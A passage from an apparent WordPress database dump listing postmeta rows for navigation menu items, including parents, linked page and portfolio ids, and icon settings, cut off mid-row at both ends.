t_type'),(50532,4163,'_menu_item_menu_item_parent','4025'),(50533,4163,'_menu_item_object_id','3074'),(50534,4163,'_menu_item_object','page'),(50535,4163,'_menu_item_target',''),(50536,4163,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50537,4163,'_menu_item_xfn',''),(50538,4163,'_menu_item_url',''),(50539,4163,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50540,4163,'_menu_item_icon','null'),(50541,4164,'_menu_item_type','post_type'),(50542,4164,'_menu_item_menu_item_parent','4021'),(50543,4164,'_menu_item_object_id','3074'),(50544,4164,'_menu_item_object','page'),(50545,4164,'_menu_item_target',''),(50546,4164,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50547,4164,'_menu_item_xfn',''),(50548,4164,'_menu_item_url',''),(50549,4164,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50550,4164,'_menu_item_icon','null'),(50551,4165,'_menu_item_type','post_type'),(50552,4165,'_menu_item_menu_item_parent','4019'),(50553,4165,'_menu_item_object_id','1995'),(50554,4165,'_menu_item_object','page'),(50555,4165,'_menu_item_target',''),(50556,4165,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50557,4165,'_menu_item_xfn',''),(50558,4165,'_menu_item_url',''),(50559,4165,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50560,4165,'_menu_item_icon','null'),(50561,4166,'_menu_item_type','post_type'),(50562,4166,'_menu_item_menu_item_parent','4023'),(50563,4166,'_menu_item_object_id','1995'),(50564,4166,'_menu_item_object','page'),(50565,4166,'_menu_item_target',''),(50566,4166,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50567,4166,'_menu_item_xfn',''),(50568,4166,'_menu_item_url',''),(50569,4166,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50570,4166,'_menu_item_icon','null'),(50571,4167,'_menu_item_type','post_type'),(50572,4167,'_menu_item_menu_item_parent','3990'),(50573,4167,'_menu_item_object_id','3054'),(50574,4167,'_menu_item_object','page'),(50575,4167,'_menu_item_target',''),(50576,4167,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50577,4167,'_menu_item_xfn',''),(50578,4167,'_menu_item_url',''),(50579,4167,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50580,4167,'_menu_item_icon','null'),(50581,4168,'_menu_item_type','post_type'),(50582,4168,'_menu_item_menu_item_parent','3990'),(50583,4168,'_menu_item_object_id','3052'),(50584,4168,'_menu_item_object','page'),(50585,4168,'_menu_item_target',''),(50586,4168,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50587,4168,'_menu_item_xfn',''),(50588,4168,'_menu_item_url',''),(50589,4168,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50590,4168,'_menu_item_icon','null'),(50591,4169,'_menu_item_type','post_type'),(50592,4169,'_menu_item_menu_item_parent','3990'),(50593,4169,'_menu_item_object_id','3051'),(50594,4169,'_menu_item_object','page'),(50595,4169,'_menu_item_target',''),(50596,4169,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50597,4169,'_menu_item_xfn',''),(50598,4169,'_menu_item_url',''),(50599,4169,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50600,4169,'_menu_item_icon','null'),(50601,4170,'_menu_item_type','post_type'),(50602,4170,'_menu_item_menu_item_parent','3990'),(50603,4170,'_menu_item_object_id','3049'),(50604,4170,'_menu_item_object','page'),(50605,4170,'_menu_item_target',''),(50606,4170,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50607,4170,'_menu_item_xfn',''),(50608,4170,'_menu_item_url',''),(50609,4170,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50610,4170,'_menu_item_icon','null'),(50611,4171,'_menu_item_type','post_type'),(50612,4171,'_menu_item_menu_item_parent','3990'),(50613,4171,'_menu_item_object_id','3048'),(50614,4171,'_menu_item_object','page'),(50615,4171,'_menu_item_target',''),(50616,4171,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50617,4171,'_menu_item_xfn',''),(50618,4171,'_menu_item_url',''),(50619,4171,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50620,4171,'_menu_item_icon','null'),(50621,4172,'_menu_item_type','post_type'),(50622,4172,'_menu_item_menu_item_parent','3990'),(50623,4172,'_menu_item_object_id','3058'),(50624,4172,'_menu_item_object','page'),(50625,4172,'_menu_item_target',''),(50626,4172,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50627,4172,'_menu_item_xfn',''),(50628,4172,'_menu_item_url',''),(50629,4172,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50630,4172,'_menu_item_icon','null'),(50631,4173,'_menu_item_type','post_type'),(50632,4173,'_menu_item_menu_item_parent','3990'),(50633,4173,'_menu_item_object_id','4035'),(50634,4173,'_menu_item_object','page'),(50635,4173,'_menu_item_target',''),(50636,4173,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50637,4173,'_menu_item_xfn',''),(50638,4173,'_menu_item_url',''),(50639,4173,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50640,4173,'_menu_item_icon','null'),(50641,4174,'_menu_item_type','post_type'),(50642,4174,'_menu_item_menu_item_parent','3990'),(50643,4174,'_menu_item_object_id','3057'),(50644,4174,'_menu_item_object','page'),(50645,4174,'_menu_item_target',''),(50646,4174,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50647,4174,'_menu_item_xfn',''),(50648,4174,'_menu_item_url',''),(50649,4174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50650,4174,'_menu_item_icon','null'),(50651,4175,'_menu_item_type','post_type'),(50652,4175,'_menu_item_menu_item_parent','3990'),(50653,4175,'_menu_item_object_id','3050'),(50654,4175,'_menu_item_object','page'),(50655,4175,'_menu_item_target',''),(50656,4175,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50657,4175,'_menu_item_xfn',''),(50658,4175,'_menu_item_url',''),(50659,4175,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50660,4175,'_menu_item_icon','null'),(50661,4176,'_menu_item_type','post_type'),(50662,4176,'_menu_item_menu_item_parent','4020'),(50663,4176,'_menu_item_object_id','2019'),(50664,4176,'_menu_item_object','page'),(50665,4176,'_menu_item_target',''),(50666,4176,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50667,4176,'_menu_item_xfn',''),(50668,4176,'_menu_item_url',''),(50669,4176,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50670,4176,'_menu_item_icon','null'),(50671,4177,'_menu_item_type','post_type'),(50672,4177,'_menu_item_menu_item_parent','4024'),(50673,4177,'_menu_item_object_id','2019'),(50674,4177,'_menu_item_object','page'),(50675,4177,'_menu_item_target',''),(50676,4177,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50677,4177,'_menu_item_xfn',''),(50678,4177,'_menu_item_url',''),(50679,4177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50680,4177,'_menu_item_icon','null'),(50681,4178,'_menu_item_type','post_type'),(50682,4178,'_menu_item_menu_item_parent','4025'),(50683,4178,'_menu_item_object_id','1948'),(50684,4178,'_menu_item_object','page'),(50685,4178,'_menu_item_target',''),(50686,4178,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50687,4178,'_menu_item_xfn',''),(50688,4178,'_menu_item_url',''),(50689,4178,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50690,4178,'_menu_item_icon','null'),(50691,4179,'_menu_item_type','post_type'),(50692,4179,'_menu_item_menu_item_parent','4021'),(50693,4179,'_menu_item_object_id','1948'),(50694,4179,'_menu_item_object','page'),(50695,4179,'_menu_item_target',''),(50696,4179,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50697,4179,'_menu_item_xfn',''),(50698,4179,'_menu_item_url',''),(50699,4179,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50700,4179,'_menu_item_icon','null'),(50701,4180,'_menu_item_type','post_type'),(50702,4180,'_menu_item_menu_item_parent','4018'),(50703,4180,'_menu_item_object_id','2174'),(50704,4180,'_menu_item_object','page'),(50705,4180,'_menu_item_target',''),(50706,4180,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50707,4180,'_menu_item_xfn',''),(50708,4180,'_menu_item_url',''),(50709,4180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50710,4180,'_menu_item_icon','icon-star'),(50711,4180,'_menu_item_icon_pack','simple_line_icons'),(50712,4181,'_menu_item_type','post_type'),(50713,4181,'_menu_item_menu_item_parent','4022'),(50714,4181,'_menu_item_object_id','2174'),(50715,4181,'_menu_item_object','page'),(50716,4181,'_menu_item_target',''),(50717,4181,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50718,4181,'_menu_item_xfn',''),(50719,4181,'_menu_item_url',''),(50720,4181,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50721,4181,'_menu_item_icon','icon-star'),(50722,4181,'_menu_item_icon_pack','simple_line_icons'),(50723,4182,'_menu_item_type','post_type'),(50724,4182,'_menu_item_menu_item_parent','3999'),(50725,4182,'_menu_item_object_id','1679'),(50726,4182,'_menu_item_object','page'),(50727,4182,'_menu_item_target',''),(50728,4182,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50729,4182,'_menu_item_xfn',''),(50730,4182,'_menu_item_url',''),(50731,4182,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50732,4182,'_menu_item_icon','null'),(50733,4183,'_menu_item_type','post_type'),(50734,4183,'_menu_item_menu_item_parent','4027'),(50735,4183,'_menu_item_object_id','3770'),(50736,4183,'_menu_item_object','post'),(50737,4183,'_menu_item_target',''),(50738,4183,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50739,4183,'_menu_item_xfn',''),(50740,4183,'_menu_item_url',''),(50741,4183,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50742,4183,'_menu_item_icon','null'),(50743,4184,'_menu_item_type','post_type'),(50744,4184,'_menu_item_menu_item_parent','4027'),(50745,4184,'_menu_item_object_id','1685'),(50746,4184,'_menu_item_object','post'),(50747,4184,'_menu_item_target',''),(50748,4184,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50749,4184,'_menu_item_xfn',''),(50750,4184,'_menu_item_url',''),(50751,4184,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50752,4184,'_menu_item_icon','null'),(50753,4185,'_menu_item_type','post_type'),(50754,4185,'_menu_item_menu_item_parent','4027'),(50755,4185,'_menu_item_object_id','1677'),(50756,4185,'_menu_item_object','post'),(50757,4185,'_menu_item_target',''),(50758,4185,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50759,4185,'_menu_item_xfn',''),(50760,4185,'_menu_item_url',''),(50761,4185,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50762,4185,'_menu_item_icon','null'),(50763,4186,'_menu_item_type','post_type'),(50764,4186,'_menu_item_menu_item_parent','4027'),(50765,4186,'_menu_item_object_id','1671'),(50766,4186,'_menu_item_object','post'),(50767,4186,'_menu_item_target',''),(50768,4186,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50769,4186,'_menu_item_xfn',''),(50770,4186,'_menu_item_url',''),(50771,4186,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50772,4186,'_menu_item_icon','null'),(50773,4187,'_menu_item_type','post_type'),(50774,4187,'_menu_item_menu_item_parent','4027'),(50775,4187,'_menu_item_object_id','1670'),(50776,4187,'_menu_item_object','post'),(50777,4187,'_menu_item_target',''),(50778,4187,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50779,4187,'_menu_item_xfn',''),(50780,4187,'_menu_item_url',''),(50781,4187,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50782,4187,'_menu_item_icon','null'),(50783,4188,'_menu_item_type','post_type'),(50784,4188,'_menu_item_menu_item_parent','4027'),(50785,4188,'_menu_item_object_id','1681'),(50786,4188,'_menu_item_object','post'),(50787,4188,'_menu_item_target',''),(50788,4188,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50789,4188,'_menu_item_xfn',''),(50790,4188,'_menu_item_url',''),(50791,4188,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50792,4188,'_menu_item_icon','null'),(50793,4189,'_menu_item_type','post_type'),(50794,4189,'_menu_item_menu_item_parent','4026'),(50795,4189,'_menu_item_object_id','3078'),(50796,4189,'_menu_item_object','portfolio-item'),(50797,4189,'_menu_item_target',''),(50798,4189,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50799,4189,'_menu_item_xfn',''),(50800,4189,'_menu_item_url',''),(50801,4189,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50802,4189,'_menu_item_icon','null'),(50803,4190,'_menu_item_type','post_type'),(50804,4190,'_menu_item_menu_item_parent','4006'),(50805,4190,'_menu_item_object_id','3441'),(50806,4190,'_menu_item_object','page'),(50807,4190,'_menu_item_target',''),(50808,4190,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50809,4190,'_menu_item_xfn',''),(50810,4190,'_menu_item_url',''),(50811,4190,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50812,4191,'_menu_item_type','post_type'),(50813,4191,'_menu_item_menu_item_parent','4029'),(50814,4191,'_menu_item_object_id','3075'),(50815,4191,'_menu_item_object','portfolio-item'),(50816,4191,'_menu_item_target',''),(50817,4191,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50818,4191,'_menu_item_xfn',''),(50819,4191,'_menu_item_url',''),(50820,4191,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50821,4191,'_menu_item_icon','null'),(50822,4192,'_menu_item_type','post_type'),(50823,4192,'_menu_item_menu_item_parent','4029'),(50824,4192,'_menu_item_object_id','3076'),(50825,4192,'_menu_item_object','portfolio-item'),(50826,4192,'_menu_item_target',''),(50827,4192,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50828,4192,'_menu_item_xfn',''),(50829,4192,'_menu_item_url',''),(50830,4192,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50831,4192,'_menu_item_icon','null'),(50832,4193,'_menu_item_type','post_type'),(50833,4193,'_menu_item_menu_item_parent','4029'),(50834,4193,'_menu_item_object_id','3077'),(50835,4193,'_menu_item_object','portfolio-item'),(50836,4193,'_menu_item_target',''),(50837,4193,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50838,4193,'_menu_item_xfn',''),(50839,4193,'_menu_item_url',''),(50840,4193,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50841,4193,'_menu_item_icon','null'),(50842,4194,'_menu_item_type','post_type'),(50843,4194,'_menu_item_menu_item_parent','4029'),(50844,4194,'_menu_item_object_id','3078'),(50845,4194,'_menu_item_object','portfolio-item'),(50846,4194,'_menu_item_target',''),(50847,4194,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50848,4194,'_menu_item_xfn',''),(50849,4194,'_menu_item_url',''),(50850,4194,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50851,4194,'_menu_item_icon','null'),(50852,4195,'_menu_item_type','post_type'),(50853,4195,'_menu_item_menu_item_parent','4029'),(50854,4195,'_menu_item_object_id','3098'),(50855,4195,'_menu_item_object','portfolio-item'),(50856,4195,'_menu_item_target',''),(50857,4195,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50858,4195,'_menu_item_xfn',''),(50859,4195,'_menu_item_url',''),(50860,4195,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50861,4195,'_menu_item_icon','null'),(50862,4196,'_menu_item_type','post_type'),(50863,4196,'_menu_item_menu_item_parent','4024'),(50864,4196,'_menu_item_object_id','2387'),(50865,4196,'_menu_item_object','page'),(50866,4196,'_menu_item_target',''),(50867,4196,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50868,4196,'_menu_item_xfn',''),(50869,4196,'_menu_item_url',''),(50870,4196,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50871,4196,'_menu_item_icon','null'),(50872,4197,'_menu_item_type','post_type'),(50873,4197,'_menu_item_menu_item_parent','4020'),(50874,4197,'_menu_item_object_id','2387'),(50875,4197,'_menu_item_object','page'),(50876,4197,'_menu_item_target',''),(50877,4197,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50878,4197,'_menu_item_xfn',''),(50879,4197,'_menu_item_url',''),(50880,4197,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50881,4197,'_menu_item_icon','null'),(50882,4198,'_menu_item_type','post_type'),(50883,4198,'_menu_item_menu_item_parent','4032'),(50884,4198,'_menu_item_object_id','3075'),(50885,4198,'_menu_item_object','portfolio-item'),(50886,4198,'_menu_item_target',''),(50887,4198,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50888,4198,'_menu_item_xfn',''),(50889,4198,'_menu_item_url',''),(50890,4198,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50891,4199,'_menu_item_type','post_type'),(50892,4199,'_menu_item_menu_item_parent','3999'),(50893,4199,'_menu_item_object_id','2421'),(50894,4199,'_menu_item_object','page'),(50895,4199,'_menu_item_target',''),(50896,4199,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50897,4199,'_menu_item_xfn',''),(50898,4199,'_menu_item_url',''),(50899,4199,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50900,4199,'_menu_item_icon','null'),(50901,4200,'_menu_item_type','post_type'),(50902,4200,'_menu_item_menu_item_parent','3999'),(50903,4200,'_menu_item_object_id','2419'),(50904,4200,'_menu_item_object','page'),(50905,4200,'_menu_item_target',''),(50906,4200,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50907,4200,'_menu_item_xfn',''),(50908,4200,'_menu_item_url',''),(50909,4200,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50910,4200,'_menu_item_icon','null'),(50911,4201,'_menu_item_type','post_type'),(50912,4201,'_menu_item_menu_item_parent','3991'),(50913,4201,'_menu_item_object_id','2421'),(50914,4201,'_menu_item_object','page'),(50915,4201,'_menu_item_target',''),(50916,4201,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50917,4201,'_menu_item_xfn',''),(50918,4201,'_menu_item_url',''),(50919,4201,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50920,4201,'_menu_item_icon','null'),(50921,4202,'_menu_item_type','post_type'),(50922,4202,'_menu_item_menu_item_parent','3991'),(50923,4202,'_menu_item_object_id','2419'),(50924,4202,'_menu_item_object','page'),(50925,4202,'_menu_item_target',''),(50926,4202,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50927,4202,'_menu_item_xfn',''),(50928,4202,'_menu_item_url',''),(50929,4202,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50930,4202,'_menu_item_icon','null'),(50931,4203,'_menu_item_type','post_type'),(50932,4203,'_menu_item_menu_item_parent','3993'),(50933,4203,'_menu_item_object_id','2435'),(50934,4203,'_menu_item_object','page'),(50935,4203,'_menu_item_target',''),(50936,4203,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50937,4203,'_menu_item_xfn',''),(50938,4203,'_menu_item_url',''),(50939,4203,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50940,4203,'_menu_item_icon','null'),(50941,4204,'_menu_item_type','post_type'),(50942,4204,'_menu_item_menu_item_parent','3997'),(50943,4204,'_menu_item_object_id','2435'),(50944,4204,'_menu_item_object','page'),(50945,4204,'_menu_item_target',''),(50946,4204,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50947,4204,'_menu_item_xfn',''),(50948,4204,'_menu_item_url',''),(50949,4204,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50950,4204,'_menu_item_icon','null'),(50951,4205,'_menu_item_type','post_type'),(50952,4205,'_menu_item_menu_item_parent','4032'),(50953,4205,'_menu_item_object_id','2435'),(50954,4205,'_menu_item_object','page'),(50955,4205,'_menu_item_target',''),(50956,4205,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50957,4205,'_menu_item_xfn',''),(50958,4205,'_menu_item_url',''),(50959,4205,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50960,4206,'_menu_item_type','post_type'),(50961,4206,'_menu_item_menu_item_parent','4031'),(50962,4206,'_menu_item_object_id','1811'),(50963,4206,'_menu_item_object','page'),(50964,4206,'_menu_item_target',''),(50965,4206,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50966,4206,'_menu_item_xfn',''),(50967,4206,'_menu_item_url',''),(50968,4206,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50969,4206,'_menu_item_icon','null'),(50970,4207,'_menu_item_type','post_type'),(50971,4207,'_menu_item_menu_item_parent','4031'),(50972,4207,'_menu_item_object_id','1819'),(50973,4207,'_menu_item_object','page'),(50974,4207,'_menu_item_target',''),(50975,4207,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50976,4207,'_menu_item_xfn',''),(50977,4207,'_menu_item_url',''),(50978,4207,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50979,4207,'_menu_item_icon','null'),(50980,4208,'_menu_item_type','post_type'),(50981,4208,'_menu_item_menu_item_parent','4031'),(50982,4208,'_menu_item_object_id','1805'),(50983,4208,'_menu_item_object','page'),(50984,4208,'_menu_item_target',''),(50985,4208,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50986,4208,'_menu_item_xfn',''),(50987,4208,'_menu_item_url',''),(50988,4208,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50989,4208,'_menu_item_icon','null'),(50990,4209,'_menu_item_type','post_type'),(50991,4209,'_menu_item_menu_item_parent','4031'),(50992,4209,'_menu_item_object_id','2448'),(50993,4209,'_menu_item_object','page'),(50994,4209,'_menu_item_target',''),(50995,4209,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50996,4209,'_menu_item_xfn',''),(50997,4209,'_menu_item_url',''),(50998,4209,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50999,4209,'_menu_item_icon','null'),(51000,4210,'_menu_item_type','post_type'),(51001,4210,'_menu_item_menu_item_parent','4034'),(51002,4210,'_menu_item_object_id','2448'),(51003,4210,'_menu_item_object','page'),(51004,4210,'_menu_item_target',''),(51005,4210,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51006,4210,'_menu_item_xfn',''),(51007,4210,'_menu_item_url',''),(51008,4210,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51009,4210,'_menu_item_icon','null'),(51010,4211,'_menu_item_type','post_type'),(51011,4211,'_menu_item_menu_item_parent','4034'),(51012,4211,'_menu_item_object_id','1811'),(51013,4211,'_menu_item_object','page'),(51014,4211,'_menu_item_target',''),(51015,4211,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51016,4211,'_menu_item_xfn',''),(51017,4211,'_menu_item_url',''),(51018,4211,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51019,4211,'_menu_item_icon','null'),(51020,4212,'_menu_item_type','post_type'),(51021,4212,'_menu_item_menu_item_parent','4034'),(51022,4212,'_menu_item_object_id','1819'),(51023,4212,'_menu_item_object','page'),(51024,4212,'_menu_item_target',''),(51025,4212,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51026,4212,'_menu_item_xfn',''),(51027,4212,'_menu_item_url',''),(51028,4212,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51029,4212,'_menu_item_icon','null'),(51030,4213,'_menu_item_type','post_type'),(51031,4213,'_menu_item_menu_item_parent','4034'),(51032,4213,'_menu_item_object_id','1805'),(51033,4213,'_menu_item_object','page'),(51034,4213,'_menu_item_target',''),(51035,4213,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51036,4213,'_menu_item_xfn',''),(51037,4213,'_menu_item_url',''),(51038,4213,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51039,4213,'_menu_item_icon','null'),(51040,4214,'_menu_item_type','post_type'),(51041,4214,'_menu_item_menu_item_parent','4033'),(51042,4214,'_menu_item_object_id','2457'),(51043,4214,'_menu_item_object','page'),(51044,4214,'_menu_item_target',''),(51045,4214,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51046,4214,'_menu_item_xfn',''),(51047,4214,'_menu_item_url',''),(51048,4214,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51049,4214,'_menu_item_icon','null'),(51050,4215,'_menu_item_type','post_type'),(51051,4215,'_menu_item_menu_item_parent','4030'),(51052,4215,'_menu_item_object_id','2457'),(51053,4215,'_menu_item_object','page'),(51054,4215,'_menu_item_target',''),(51055,4215,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51056,4215,'_menu_item_xfn',''),(51057,4215,'_menu_item_url',''),(51058,4215,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51059,4215,'_menu_item_icon','null'),(51060,4216,'_menu_item_type','post_type'),(51061,4216,'_menu_item_menu_item_parent','4018'),(51062,4216,'_menu_item_object_id','2477'),(51063,4216,'_menu_item_object','page'),(51064,4216,'_menu_item_target',''),(51065,4216,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51066,4216,'_menu_item_xfn',''),(51067,4216,'_menu_item_url',''),(51068,4216,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51069,4216,'_menu_item_icon','icon-star'),(51070,4216,'_menu_item_icon_pack','simple_line_icons'),(51071,4217,'_menu_item_type','post_type'),(51072,4217,'_menu_item_menu_item_parent','4022'),(51073,4217,'_menu_item_object_id','2477'),(51074,4217,'_menu_item_object','page'),(51075,4217,'_menu_item_target',''),(51076,4217,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51077,4217,'_menu_item_xfn',''),(51078,4217,'_menu_item_url',''),(51079,4217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51080,4217,'_menu_item_icon','icon-star'),(51081,4217,'_menu_item_icon_pack','simple_line_icons'),(51082,4218,'_menu_item_type','post_type'),(51083,4218,'_menu_item_menu_item_parent','4023'),(51084,4218,'_menu_item_object_id','2494'),(51085,4218,'_menu_item_object','page'),(51086,4218,'_menu_item_target',''),(51087,4218,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51088,4218,'_menu_item_xfn',''),(51089,4218,'_menu_item_url',''),(51090,4218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51091,4218,'_menu_item_icon','icon-star'),(51092,4218,'_menu_item_icon_pack','simple_line_icons'),(51093,4219,'_menu_item_type','post_type'),(51094,4219,'_menu_item_menu_item_parent','4023'),(51095,4219,'_menu_item_object_id','2472'),(51096,4219,'_menu_item_object','page'),(51097,4219,'_menu_item_target',''),(51098,4219,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51099,4219,'_menu_item_xfn',''),(51100,4219,'_menu_item_url',''),(51101,4219,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51102,4219,'_menu_item_icon','icon-star'),(51103,4219,'_menu_item_icon_pack','simple_line_icons'),(51104,4220,'_menu_item_type','post_type'),(51105,4220,'_menu_item_menu_item_parent','4019'),(51106,4220,'_menu_item_object_id','2494'),(51107,4220,'_menu_item_object','page'),(51108,4220,'_menu_item_target',''),(51109,4220,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51110,4220,'_menu_item_xfn',''),(51111,4220,'_menu_item_url',''),(51112,4220,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51113,4220,'_menu_item_icon','icon-star'),(51114,4220,'_menu_item_icon_pack','simple_line_icons'),(51115,4221,'_menu_item_type','post_type'),(51116,4221,'_menu_item_menu_item_parent','4019'),(51117,4221,'_menu_item_object_id','2472'),(51118,4221,'_menu_item_object','page'),(51119,4221,'_menu_item_target',''),(51120,4221,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51121,4221,'_menu_item_xfn',''),(51122,4221,'_menu_item_url',''),(51123,4221,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(51124,4221,'_menu_item_icon','icon-star'),(51125,4221,'_menu_item_icon_pack','simple_line_icons'),(51126,4222,'_menu_item_type','post_type'),(51127,4222,'_menu_item_menu_item_parent','3993'),(51128,4222,'_menu_item_object_id','2627'),(51129,4222,'_menu_item_object','page'),(51130,4222,'_menu_item_target',''),(51131,4222,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(51132,4222,'_menu_item_xfn',''),(51133,4222,'_menu_item_url',''),(51134,4222,'_vc_post_settings','a:1:{s:10:\"vc_